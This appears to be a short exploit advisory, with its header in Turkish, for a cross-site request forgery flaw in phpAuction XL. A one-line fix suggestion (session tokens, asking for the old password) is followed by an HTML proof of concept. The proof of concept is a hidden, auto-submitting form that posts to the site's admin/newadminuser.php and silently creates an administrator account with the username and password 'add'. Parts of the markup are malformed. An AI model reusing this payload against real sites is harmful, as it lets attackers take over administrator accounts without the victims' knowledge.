< ------------------- header data start ------------------- >

#############################################################

# Application Name : phpAuction XL

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/BizaRRo

#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<form action=http://www.site.net/[PATCH]/admin/newadminuser.php method=post name=BizaRRo >

<INPUT TYPE=hidden NAME=username SIZE=25 MAXLENGTH=32 VALUE=add>
<INPUT TYPE=hidden NAME=password SIZE=25 value=add>
<INPUT TYPE=hidden NAME=repeatpassword SIZE=25 value=add>
<INPUT TYPE=hidden NAME=status VALUE=1 CHECKED>
<INPUT TYPE=hidden NAME=action VALUE=insert>
<INPUT TYPE=hidden NAME=security VALUE= />

<input type=submit value=create name=B1>


< -- bug code end of -- >